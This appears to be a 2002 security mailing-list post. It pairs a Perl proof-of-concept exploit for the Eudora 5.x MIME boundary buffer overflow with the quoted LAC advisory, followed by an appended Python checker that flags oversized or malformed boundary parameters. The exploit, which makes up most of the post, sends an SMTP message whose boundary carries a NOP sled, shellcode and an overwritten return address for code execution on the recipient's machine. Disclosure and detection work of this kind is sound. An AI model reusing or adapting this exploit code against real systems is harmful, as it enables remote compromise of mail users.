From: Kanatoko (anvil_at_jumperz.net)
Date: Tue Aug 06 2002 - 01:49:24 CDT


This is a proof of concept exploit for the Eudora 5.x buffer overflow.

Tested on:
  Japanese Windows 2000 Professional SP2
  Eudora Version 5.0.2-Jr2

#!/usr/local/bin/perl

#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#---------------------------------------------------------------------

use strict;
use warnings;
use Socket;

my $connect_host = 'mail.jumperz.net';
my $port         = 25;
my $env_from     = 'anvil@jumperz.net';
my $env_to       = 'target@jumperz.net';
my $from         = 'anvil@jumperz.net';
my $to           = 'target@jumperz.net';

my $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
my $sock_addr = pack_sockaddr_in($port, $iaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "Socket Error.\n";
connect(SOCKET, $sock_addr) || die "Connect Error\n";
select(SOCKET); $| = 1; select(STDOUT);   # unbuffered writes to the socket

# egg written by UNYUN (http://www.shadowpenguin.org/)
# 57 bytes: 46 bytes of code followed by the 11-byte "notepad.exe" string
my $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

# The overlong MIME boundary: NOP sled, egg, a short jump back into the
# sled, two bytes of padding, then the overwritten return address.
my $buf = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0";            # JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77";    # 0x77e3ac97 JMP EBX in user32.dll

# Minimal SMTP dialogue; each server reply is read and discarded.
my $hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;

# Message headers: the payload travels in the boundary parameter of
# Content-Type. The heredoc terminator must stay at column 0.
print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;

-- 
Kanatoko  <anvil@jumperz.net>
JUMPER : http://www.jumperz.net/ (Japanese)


On Mon, 05 Aug 2002 15:24:25 +0900 snsadv@lac.co.jp wrote:

> ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
>
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
>
> Overview:
> ---------
> Eudora 5.x for Windows contains a buffer overflow vulnerability,
> which could allow a remote attacker to execute arbitrary code.
>
> Problem Description:
> --------------------
> Eudora, developed and distributed by QUALCOMM Inc.
> (http://www.qualcomm.com/), is a Mail User Agent running on Windows
> 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
>
> The buffer overflow occurs when Eudora receives a message using a long
> string as a boundary, which is used to divide a multi-part message into
> separate parts. In our verification environment, we have found that
> this could allow arbitrary commands to be executed.
>
> Tested Version:
> ---------------
> Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
> Eudora 5.1.1 for Windows (Sponsored Mode) [English]
>
> Tested OS:
> ----------
> Microsoft Windows 2000 Professional SP2 [Japanese]
> Microsoft Windows 98 SE [Japanese]
>
> Solution:
> ---------
> The problem will be fixed in the next release of Eudora.
> The vendor has not reported when the next release will be available.
>
> Communication background:
> -------------------------
> 6 Jun 2002  : We discovered the vulnerability.
> 6 Jun 2002  : We reported the findings to Livin' on the EDGE Co., Ltd.
>               (user support of Japanese version).
> 14 Jun 2002 : The findings were reported again to Livin' on the EDGE
>               Co., Ltd.
> 17 Jun 2002 : We contacted QUALCOMM Inc.
> 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
>               investigation of the problem.
> 3 Jul 2002  : We asked QUALCOMM Inc. about the progress of the
>               investigation.
> 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
>               investigation.
> 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
>               of this advisory.
> 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
>               the next release.
> 5 Aug 2002  : We decided to disclose this vulnerability due to concern
>               over the potential consequences this issue may cause.
>               Livin' on the EDGE Co., Ltd. has not provided any comments
>               on this issue as of August 5, 2002.
>
> Discovered by:
> --------------
> Nobuo Miwa (LAC / n-miwa@lac.co.jp)
>
> Disclaimer:
> -----------
> All information in these advisories is subject to change without any
> advance notice or mutual consensus, and each of them is released
> as it is. LAC Co., Ltd. is not responsible for any risks of occurrences
> caused by applying this information.
>
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadv@lac.co.jp>
> Computer Security Laboratory, LAC http://www.lac.co.jp/security/
>
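A defensive counterpart to the thread, added here and not part of Kanatoko's script or the LAC advisory: a small Python checker that a mail gateway or IDS could run over raw messages to flag a Content-Type boundary parameter that breaks the RFC 2046 limits (at most 70 characters from a restricted character set) which the vulnerable Eudora parser evidently did not enforce. The two sample messages are constructed for the example and carry no shellcode; the second only reproduces the shape of the trigger, a 186-byte quoted boundary that is mostly 0x90 bytes.

```python
import re

# RFC 2046 section 5.1.1: a boundary is 1 to 70 characters drawn from
# "bchars" (digits, letters, '()+_,-./:=? and space, not ending in space).
MAX_BOUNDARY_LEN = 70
BCHARS = set(b"0123456789abcdefghijklmnopqrstuvwxyz"
             b"ABCDEFGHIJKLMNOPQRSTUVWXYZ'()+_,-./:=? ")

_CT_RE = re.compile(rb"^content-type:[ \t]*(.*)$", re.I)
_BOUNDARY_RE = re.compile(rb'boundary=(?:"([^"]*)"|([^;\s]*))', re.I)

def header_block(raw):
    # Header section of a raw message, with folded continuation lines unfolded.
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    return re.sub(rb"\r?\n[ \t]+", b" ", head)

def extract_boundary(raw):
    # Boundary parameter (bytes) of the Content-Type header, or None.
    for line in re.split(rb"\r?\n", header_block(raw)):
        m = _CT_RE.match(line)
        if m:
            b = _BOUNDARY_RE.search(m.group(1))
            if b:
                return b.group(1) if b.group(1) is not None else b.group(2)
    return None

def boundary_findings(raw):
    # Reasons the boundary violates RFC 2046; an empty list means it looks sane.
    boundary = extract_boundary(raw)
    if boundary is None:
        return []
    findings = []
    if len(boundary) > MAX_BOUNDARY_LEN:
        findings.append("boundary length %d exceeds RFC 2046 limit of %d"
                        % (len(boundary), MAX_BOUNDARY_LEN))
    bad = sorted({c for c in boundary if c not in BCHARS})
    if bad:
        findings.append("boundary holds %d byte value(s) outside RFC 2046 "
                        "bchars, first 0x%02x" % (len(bad), bad[0]))
    return findings

# Constructed samples (no shellcode): HOSTILE only has the shape of the trigger
# in the advisory, a 186-byte quoted boundary that is mostly 0x90 bytes.
BENIGN = (b"MIME-Version: 1.0\r\nFrom: a@example.test\r\n"
          b"Content-Type: multipart/mixed;\r\n boundary=\"----=_Part_42\"\r\n"
          b"\r\n------=_Part_42\r\n")
HOSTILE = (b"MIME-Version: 1.0\r\nFrom: a@example.test\r\n"
           b"Content-Type: multipart/mixed; boundary=\""
           + b"\x90" * 121 + b"A" * 65 + b"\"\r\n\r\n.\r\n")
```

Calling boundary_findings(HOSTILE) returns both the length and the character-set finding, while BENIGN returns an empty list; either finding alone is enough for a gateway to quarantine the message before a MIME parser touches it.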